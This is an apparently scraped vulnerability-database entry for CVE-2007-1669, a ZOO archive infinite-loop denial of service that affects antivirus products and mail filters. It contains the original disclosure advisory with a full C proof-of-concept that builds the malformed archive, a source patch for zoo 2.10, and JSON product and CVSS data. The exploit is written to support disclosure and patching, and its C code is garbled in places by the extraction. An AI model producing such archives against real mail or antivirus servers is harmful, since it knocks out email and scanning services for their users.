          "date": "2024-06-15T00:00:00Z",
          "details": "moderate"
        }
      ],
      "title": "CVE-2006-0855"
    },
    {
      "cve": "CVE-2007-1669",
      "ids": [
        {
          "system_name": "SUSE CVE Page",
          "text": "https://www.suse.com/security/cve/CVE-2007-1669"
        }
      ],
      "notes": [
        {
          "category": "general",
          "text": "zoo decoder 2.10 (zoo-2.10), as used in multiple products including (1) Barracuda Spam Firewall 3.4 and later with virusdef before 2.0.6399, (2) Spam Firewall before 3.4 20070319 with virusdef before 2.0.6399o, and (3) AMaViS 2.4.1 and earlier, allows remote attackers to cause a denial of service (infinite loop) via a ZOO archive with a direntry structure that points to a previous file.",
          "title": "CVE description"
        }
      ],
      "product_status": {
        "recommended": [
          "openSUSE Tumbleweed:zoo-2.10-1025.8.aarch64",
          "openSUSE Tumbleweed:zoo-2.10-1025.8.ppc64le",
          "openSUSE Tumbleweed:zoo-2.10-1025.8.s390x",
          "openSUSE Tumbleweed:zoo-2.10-1025.8.x86_64"
        ]
      },
      "references": [
        {
          "category": "external",
          "summary": "CVE-2007-1669",
          "url": "https://www.suse.com/security/cve/CVE-2007-1669"
        },
        {
          "category": "external",
          "summary": "SUSE Bug 271781 for CVE-2007-1669",
          "url": "https://bugzilla.suse.com/271781"
        }
      ],
      "remediations": [
        {
          "category": "vendor_fix",
          "details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
          "product_ids": [
            "openSUSE Tumbleweed:zoo-2.10-1025.8.aarch64",
            "openSUSE Tumbleweed:zoo-2.10-1025.8.ppc64le",
            "openSUSE Tumbleweed:zoo-2.10-1025.8.s390x",
            "openSUSE Tumbleweed:zoo-2.10-1025.8.x86_64"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "date": "2024-06-15T00:00:00Z",
          "details": "important"
        }
      ],
      "title": "CVE-2007-1669"
    }
  ]
}

VAR-200705-0183

Vulnerability from variot - Updated: 2023-12-18 12:12

zoo decoder 2.10 (zoo-2.10), as used in multiple products including (1) Barracuda Spam Firewall 3.4 and later with virusdef before 2.0.6399, (2) Spam Firewall before 3.4 20070319 with virusdef before 2.0.6399o, and (3) AMaViS 2.4.1 and earlier, allows remote attackers to cause a denial of service (infinite loop) via a ZOO archive with a direntry structure that points to a previous file. (1) Barracuda Spam Firewall Or (2) Spam Firewall ,and (3) AMaViS Used in etc. The Zoo compression algorithm is prone to a remote denial-of-service vulnerability. This issue arises when applications implementing the Zoo algorithm process certain malformed archives. A successful attack can exhaust system resources and trigger a denial-of-service condition. This issue affects Zoo 2.10 and other applications implementing the vulnerable algorithm.

Try a new way to discover vulnerabilities that ALREADY EXIST in your IT infrastructure.

Join the FREE BETA test of the Network Software Inspector (NSI)! http://secunia.com/network_software_inspector/

The NSI enables you to INSPECT, DISCOVER, and DOCUMENT vulnerabilities in more than 4,000 different Windows applications.

The vulnerability is caused due to an error in the handling of Zoo archives. This can be exploited to cause an infinite loop resulting in high CPU utilisation.

SOLUTION: Update to firmware version 3.4 and virus definition 2.0.6399 or later.

PROVIDED AND/OR DISCOVERED BY: Jean-Sebastien Guay-Leroux

ORIGINAL ADVISORY: Barracuda Networks: http://www.barracudanetworks.com/ns/resources/tech_alert.php

Jean-Sebastien Guay-Leroux: http://www.guay-leroux.com/projects/zoo-infinite-advisory.txt

About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities.

Subscribe: http://secunia.com/secunia_security_advisories/

Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/

Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.

Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org

. Topic: Multiple vendors ZOO file decompression infinite loop DoS

Announced: 2007-05-04 Credits: Jean-Sebastien Guay-Leroux Products: Multiple (see section III) Impact: DoS (99% CPU utilisation) CVE ID: CVE-2007-1669, CVE-2007-1670, CVE-2007-1671, CVE-2007-1672, CVE-2007-1673

I. BACKGROUND

Zoo is a compression program and format developed by Rahul Dhesi in the mid 1980s. The format is based on the LZW compression algorithm and compressed files are identified by the .zoo file extension.

II. The vulnerability lies in the algorithm used to locate the files inside the archive. Each file in a ZOO archive is identified by a direntry structure. Those structures are linked between themselves with a 'next' pointer. This pointer is in fact an offset from the beginning of the file, representing the next direntry structure. By specifying an already processed file, it's possible to process more than one time this same file. The ZOO parser will then enter an infinite loop condition.

III. AFFECTED SOFTWARES

o Barracuda Spam Firewall o Panda Software Antivirus o avast! antivirus o Avira AntiVir o zoo-2.10 o unzoo.c o WinAce o PicoZip

IV. IMPACT

If this attack is conducted against a vulnerable antivirus, the host system will have its CPU at 100% utilization and may have problems answering other requests.

If this attack is conducted against an SMTP content filter running a vulnerable ZOO implementation, legitimate clients may be unable to send and receive email through this server.

V. SOLUTION

o Barracuda Spam Firewall - CVE-2007-1669: They fixed this problem in virusdef 2.0.6399 for firmware >= 3.4 and 2.0.6399o for firmware < 3.4 March 19th 2007.

o Panda Software Antivirus - CVE-2007-1670: They fixed this problem April 2nd 2007.

o avast! antivirus - CVE-2007-1672: They fixed this problem in version 4.7.981, April 14th 2007.

o Avira AntiVir - CVE-2007-1671: They fixed this problem in avpack32.dll version 7.3.0.6 March 22th 2007.

o zoo-2.10 - CVE-2007-1669: This software is not maintained anymore. A patch for version 2.10 is provided in section VII of this advisory because some SMTP content filters may still use this software.

o unzoo.c - CVE-2007-1673: This software is not maintained anymore. No patch is provided for this software.

o WinAce was contacted but no response was received from them.

o PicoZip was contacted but no response was received from them.

VI. PROOF OF CONCEPT

Using the PIRANA framework version 0.3.3, available at http://www.guay-leroux.com , it is possible to test your SMTP server against this vulnerability.

Alternatively, here is an exploit that will create a file that will trigger the infinite loop condition when it is processed.

Exploit for the vulnerability: Multiple vendors ZOO file decompression infinite loop DoS

coded by Jean-S\xe9bastien Guay-Leroux September 2006

include

// Structure of a ZOO header

define ZOO_HEADER_SIZE 0x0000002a

define ZH_TEXT 0

define ZH_TAG 20

define ZH_START_OFFSET 24

define ZH_NEG_START_OFFSET 28

define ZH_MAJ_VER 32

define ZH_MIN_VER 33

define ZH_ARC_HTYPE 34

define ZH_ARC_COMMENT 35

define ZH_ARC_COMMENT_LENGTH 39

define ZH_VERSION_DATA 41

define D_DIRENTRY_LENGTH 56

define D_TAG 0

define D_TYPE 4

define D_PACKING_METHOD 5

define D_NEXT_ENTRY 6

define D_OFFSET 10

define D_DATE 14

define D_TIME 16

define D_FILE_CRC 18

define D_ORIGINAL_SIZE 20

define D_SIZE_NOW 24

define D_MAJ_VER 28

define D_MIN_VER 29

define D_DELETED 30

define D_FILE_STRUCT 31

define D_COMMENT_OFFSET 32

define D_COMMENT_SIZE 36

define D_FILENAME 38

define D_VAR_DIR_LEN 51

define D_TIMEZONE 53

define D_DIR_CRC 54

define D_NAMLEN ( D_DIRENTRY_LENGTH + 0 )

define D_DIRLEN ( D_DIRENTRY_LENGTH + 1 )

define D_LFILENAME ( D_DIRENTRY_LENGTH + 2 )

void put_byte (char ptr, unsigned char data) { ptr = data; }

void put_word (char *ptr, unsigned short data) { put_byte (ptr, data); put_byte (ptr + 1, data >> 8); }

void put_longword (char *ptr, unsigned long data) { put_byte (ptr, data); put_byte (ptr + 1, data >> 8); put_byte (ptr + 2, data >> 16); put_byte (ptr + 3, data >> 24); }

FILE * open_file (char *filename) {

     FILE *fp;

     fp = fopen ( filename , "w" );

     if (!fp) {
             perror ("Cant open file");
             exit (1);
     }

     return fp;

}

void usage (char *progname) {

     printf ("\nTo use:\n");
     printf ("%s <archive name>\n\n", progname);

     exit (1);

}

int main (int argc, char argv[]) { FILE fp; char hdr = (char ) malloc (4096); char filename = (char ) malloc (256); int written_bytes; int total_size;

     if ( argc != 2) {
             usage ( argv[0] );
     }

     strncpy (filename, argv[1], 255);

     if (!hdr || !filename) {
             perror ("Error allocating memory");
             exit (1);
     }

     memset (hdr, 0x00, 4096);

     // Build a ZOO header
     memcpy          (hdr + ZH_TEXT, "ZOO 2.10 Archive.\032", 18);
     put_longword    (hdr + ZH_TAG, 0xfdc4a7dc);
     put_longword    (hdr + ZH_START_OFFSET, ZOO_HEADER_SIZE);
     put_longword    (hdr + ZH_NEG_START_OFFSET,
         (ZOO_HEADER_SIZE) * -1);
     put_byte        (hdr + ZH_MAJ_VER, 2);
     put_byte        (hdr + ZH_MIN_VER, 0);
     put_byte        (hdr + ZH_ARC_HTYPE, 1);
     put_longword    (hdr + ZH_ARC_COMMENT, 0);
     put_word        (hdr + ZH_ARC_COMMENT_LENGTH, 0);
     put_byte        (hdr + ZH_VERSION_DATA, 3);

     // Build vulnerable direntry struct
     put_longword    (hdr + ZOO_HEADER_SIZE + D_TAG, 0xfdc4a7dc);
     put_byte        (hdr + ZOO_HEADER_SIZE + D_TYPE, 1);
     put_byte        (hdr + ZOO_HEADER_SIZE + D_PACKING_METHOD, 0);
     put_longword    (hdr + ZOO_HEADER_SIZE + D_NEXT_ENTRY, 0x2a);
     put_longword    (hdr + ZOO_HEADER_SIZE + D_OFFSET, 0x71);
     put_word        (hdr + ZOO_HEADER_SIZE + D_DATE, 0x3394);
     put_word        (hdr + ZOO_HEADER_SIZE + D_TIME, 0x4650);
     put_word        (hdr + ZOO_HEADER_SIZE + D_FILE_CRC, 0);
     put_longword    (hdr + ZOO_HEADER_SIZE + D_ORIGINAL_SIZE, 0);
     put_longword    (hdr + ZOO_HEADER_SIZE + D_SIZE_NOW, 0);
     put_byte        (hdr + ZOO_HEADER_SIZE + D_MAJ_VER, 1);
     put_byte        (hdr + ZOO_HEADER_SIZE + D_MIN_VER, 0);
     put_byte        (hdr + ZOO_HEADER_SIZE + D_DELETED, 0);
     put_byte        (hdr + ZOO_HEADER_SIZE + D_FILE_STRUCT, 0);
     put_longword    (hdr + ZOO_HEADER_SIZE + D_COMMENT_OFFSET, 0);
     put_word        (hdr + ZOO_HEADER_SIZE + D_COMMENT_SIZE, 0);
     memcpy          (hdr + ZOO_HEADER_SIZE + D_FILENAME,
                         "AAAAAAAA.AAA", 13);

     total_size = ZOO_HEADER_SIZE + 51;

     fp = open_file (filename);

     if ( (written_bytes = fwrite ( hdr, 1, total_size, fp)) != 0 ) {
             printf ("The file has been written\n");
     } else {
             printf ("Cant write to the file\n");
             exit (1);
     }

     fclose (fp);

     return 0;

}

VII. PATCH

To fix this issue, ensure that the offset of the next file to process is always greater than the one you are currently processing. This will guarantee the fact that it's not possible to process the same files over and over again. Here is a patch for the software zoo version 2.10 distributed with many UNIX systems:

diff -u zoo/zooext.c zoo-patched/zooext.c --- zoo/zooext.c 1991-07-11 15:08:00.000000000 -0400 +++ zoo-patched/zooext.c 2007-03-16 16:45:28.000000000 -0500 @@ -89,6 +89,7 @@ #endif struct direntry direntry; / directory entry / int first_dir = 1; / first dir entry seen? / +unsigned long zoo_pointer = 0; / Track our position in the file /

static char extract_ver[] = "Zoo %d.%d is needed to extract %s.\n"; static char no_space[] = "Insufficient disk space to extract %s.\n"; @@ -169,6 +170,9 @@ exit_status = 1; } zooseek (zoo_file, zoo_header.zoo_start, 0); / seek to where data begins / + + / Begin tracking our position in the file / + zoo_pointer = zoo_header.zoo_start; }

#ifndef PORTABLE @@ -597,6 +601,12 @@ } / end if /

loop_again: + + / Make sure we are not seeking to already processed data / + if (next_ptr <= zoo_pointer) + prterror ('f', "ZOO chain structure is corrupted\n"); + zoo_pointer = next_ptr; + zooseek (zoo_file, next_ptr, 0); / ..seek to next dir entry / } / end while /

diff -u zoo/zoolist.c zoo-patched/zoolist.c --- zoo/zoolist.c 1991-07-11 15:08:04.000000000 -0400 +++ zoo-patched/zoolist.c 2007-03-16 16:45:20.000000000 -0500 @@ -92,6 +92,7 @@ int show_mode = 0; / show file protection / #endif int first_dir = 1; / if first direntry -- to adjust dat_ofs / +unsigned long zoo_pointer = 0; / Track our position in the file /

while (option) { switch (option) { @@ -211,6 +212,9 @@ show_acmt (&zoo_header, zoo_file, 0); / show archive comment / }

/ Begin tracking our position in the file /
zoo_pointer = zoo_header.zoo_start; + / Seek to the beginning of the first directory entry / if (zooseek (zoo_file, zoo_header.zoo_start, 0) != 0) { ercount++; @@ -437,6 +441,11 @@ if (verb_list && !fast) show_comment (&direntry, zoo_file, 0, (char ) NULL); } / end if (lots of conditions) */ +
/ Make sure we are not seeking to already processed data /
if (direntry.next <= zoo_pointer)
prterror ('f', "ZOO chain structure is corrupted\n");

zoo_pointer = direntry.next;

         /* ..seek to next dir entry */
zooseek (zoo_file, direntry.next, 0);

VIII. CREDITS

Jean-Sebastien Guay-Leroux found the bug and wrote the exploit for it.

IX. REFERENCES

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1669
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1670
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1671
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1672
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1673

X. HISTORY

2006-09-?? : Vulnerability is found 2007-03-19 : All vendors notified 2007-03-19 : Barracuda Networks provided a fix 2007-03-22 : Avira provided a fix 2007-04-02 : Panda Antivirus provided a fix 2007-04-14 : avast! antivirus provided a fix 2007-05-04 : Public disclosure

Show details on source website

JSON

To clipboard

{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-200705-0183",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "amavis",
        "scope": "lte",
        "trust": 1.8,
        "vendor": "amavis",
        "version": "2.4.1"
      },
      {
        "model": "spam firewall",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "barracuda",
        "version": "3.4 and later"
      },
      {
        "model": "activescan",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "panda",
        "version": "5.53"
      },
      {
        "model": "spam firewall",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "barracuda",
        "version": "3.3.3"
      },
      {
        "model": "spam firewall",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "barracuda",
        "version": "3.3.0.54"
      },
      {
        "model": "spam firewall",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "barracuda",
        "version": "3.3.03.055"
      },
      {
        "model": "spam firewall",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "barracuda",
        "version": "3.3.15.026"
      },
      {
        "model": "spam firewall",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "barracuda",
        "version": "3.1.18"
      },
      {
        "model": "spam firewall",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "barracuda",
        "version": "3.1.17"
      },
      {
        "model": "spam firewall",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "barracuda",
        "version": "3.4"
      },
      {
        "model": "spam firewall",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "barracuda",
        "version": "3.3.01.001"
      },
      {
        "model": "spam firewall",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "barracuda",
        "version": "3.3.03.053"
      },
      {
        "model": "zoo",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "zoo",
        "version": "2.10"
      },
      {
        "model": "winace",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "winace",
        "version": "2.605"
      },
      {
        "model": "winace",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "winace",
        "version": "2.5"
      },
      {
        "model": "winace",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "winace",
        "version": "2.60"
      },
      {
        "model": "unzoo",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "unzoo",
        "version": "4.4-2"
      },
      {
        "model": "picozip",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "picozip",
        "version": "4.0.2"
      },
      {
        "model": "picozip",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "picozip",
        "version": "4.0.1"
      },
      {
        "model": "titanium antivirus antispyware",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "panda",
        "version": "2006+"
      },
      {
        "model": "titanium antivirus",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "panda",
        "version": "2005"
      },
      {
        "model": "platinum internet security",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "panda",
        "version": "20070"
      },
      {
        "model": "platinum internet security",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "panda",
        "version": "2006"
      },
      {
        "model": "antivirus platinum",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "panda",
        "version": "2.0"
      },
      {
        "model": "antivirus for netware",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "panda",
        "version": "2.0"
      },
      {
        "model": "activescan",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "panda",
        "version": "5.54.1"
      },
      {
        "model": "activescan",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "panda",
        "version": "5.0"
      },
      {
        "model": "networks barracuda spam firewall",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "barracuda",
        "version": "3.3.15026"
      },
      {
        "model": "networks barracuda spam firewall",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "barracuda",
        "version": "3.1.18"
      },
      {
        "model": "networks barracuda spam firewall",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "barracuda",
        "version": "3.1.17"
      },
      {
        "model": "networks barracuda spam firewall",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "barracuda",
        "version": "3.3.03.055"
      },
      {
        "model": "networks barracuda spam firewall",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "barracuda",
        "version": "3.3.03.053"
      },
      {
        "model": "networks barracuda spam firewall",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "barracuda",
        "version": "3.3.03.022"
      },
      {
        "model": "networks barracuda spam firewall",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "barracuda",
        "version": "3.3.01.001"
      },
      {
        "model": "networks barracuda spam firewall",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "barracuda",
        "version": "3.3.0.54"
      },
      {
        "model": "desktop for windows",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avira",
        "version": "1.00.00.68"
      },
      {
        "model": "antivir workstation professional build",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avira",
        "version": "367"
      },
      {
        "model": "antivir personaledition premium build",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avira",
        "version": "228"
      },
      {
        "model": "antivir personaledition classic build",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avira",
        "version": "180"
      },
      {
        "model": "antivir",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avira",
        "version": "6.35.00.00"
      },
      {
        "model": "avast! linux home edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avast",
        "version": "1.0.5"
      },
      {
        "model": "avast! linux home edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avast",
        "version": "1.0.5-1"
      },
      {
        "model": "antivirus server edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avast",
        "version": "4.7.726"
      },
      {
        "model": "antivirus server edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avast",
        "version": "4.7.676"
      },
      {
        "model": "antivirus server edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avast",
        "version": "4.7.660"
      },
      {
        "model": "antivirus server edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avast",
        "version": "4.6.566"
      },
      {
        "model": "antivirus server edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avast",
        "version": "4.6.489"
      },
      {
        "model": "antivirus server edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avast",
        "version": "4.6.460"
      },
      {
        "model": "antivirus professional edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avast",
        "version": "4.7.844"
      },
      {
        "model": "antivirus professional edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avast",
        "version": "4.7.827"
      },
      {
        "model": "antivirus professional edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avast",
        "version": "4.6.691"
      },
      {
        "model": "antivirus professional edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avast",
        "version": "4.6.665"
      },
      {
        "model": "antivirus professional edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avast",
        "version": "4.6.652"
      },
      {
        "model": "antivirus professional edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avast",
        "version": "4.6.603"
      },
      {
        "model": "antivirus professional edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avast",
        "version": "4.6"
      },
      {
        "model": "antivirus professional edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avast",
        "version": "4.0"
      },
      {
        "model": "antivirus managed client",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avast",
        "version": "4.6.394"
      },
      {
        "model": "antivirus managed client",
        "scope": null,
        "trust": 0.3,
        "vendor": "avast",
        "version": null
      },
      {
        "model": "antivirus home edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avast",
        "version": "4.7.869"
      },
      {
        "model": "antivirus home edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avast",
        "version": "4.7.844"
      },
      {
        "model": "antivirus home edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avast",
        "version": "4.7.827"
      },
      {
        "model": "antivirus home edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avast",
        "version": "4.6.691"
      },
      {
        "model": "antivirus home edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avast",
        "version": "4.6.665"
      },
      {
        "model": "antivirus home edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avast",
        "version": "4.6.655"
      },
      {
        "model": "antivirus home edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avast",
        "version": "4.6.652"
      },
      {
        "model": "antivirus home edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avast",
        "version": "4.6"
      },
      {
        "model": "antivirus home edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avast",
        "version": "4.0"
      }
    ],
    "sources": [
      {
        "db": "BID",
        "id": "23823"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2007-001742"
      },
      {
        "db": "NVD",
        "id": "CVE-2007-1669"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200705-120"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:barracuda_networks:barracuda_spam_firewall:3.3.01.001:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  },
                  {
                    "cpe23Uri": "cpe:2.3:h:barracuda_networks:barracuda_spam_firewall:3.3.03.053:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  },
                  {
                    "cpe23Uri": "cpe:2.3:h:barracuda_networks:barracuda_spam_firewall:3.1.18:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  },
                  {
                    "cpe23Uri": "cpe:2.3:h:barracuda_networks:barracuda_spam_firewall:3.3.0.54:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  },
                  {
                    "cpe23Uri": "cpe:2.3:h:barracuda_networks:barracuda_spam_firewall:3.1.17:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  },
                  {
                    "cpe23Uri": "cpe:2.3:h:barracuda_networks:barracuda_spam_firewall:3.4:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  },
                  {
                    "cpe23Uri": "cpe:2.3:h:barracuda_networks:barracuda_spam_firewall:3.3.03.055:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  },
                  {
                    "cpe23Uri": "cpe:2.3:h:barracuda_networks:barracuda_spam_firewall:3.3.15.026:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  },
                  {
                    "cpe23Uri": "cpe:2.3:h:barracuda_networks:barracuda_spam_firewall:3.3.3:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:a:amavis:amavis:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "2.4.1",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2007-1669"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Jean-Sebastien Guay-Leroux is credited with discovering this issue.",
    "sources": [
      {
        "db": "BID",
        "id": "23823"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200705-120"
      }
    ],
    "trust": 0.9
  },
  "cve": "CVE-2007-1669",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 7.8,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 10.0,
            "impactScore": 6.9,
            "integrityImpact": "NONE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "HIGH",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Low",
            "accessVector": "Network",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "Complete",
            "baseScore": 7.8,
            "confidentialityImpact": "None",
            "exploitabilityScore": null,
            "id": "CVE-2007-1669",
            "impactScore": null,
            "integrityImpact": "None",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "High",
            "trust": 0.8,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "COMPLETE",
            "baseScore": 7.8,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 10.0,
            "id": "VHN-25031",
            "impactScore": 6.9,
            "integrityImpact": "NONE",
            "severity": "HIGH",
            "trust": 0.1,
            "vectorString": "AV:N/AC:L/AU:N/C:N/I:N/A:C",
            "version": "2.0"
          }
        ],
        "cvssV3": [],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2007-1669",
            "trust": 1.8,
            "value": "HIGH"
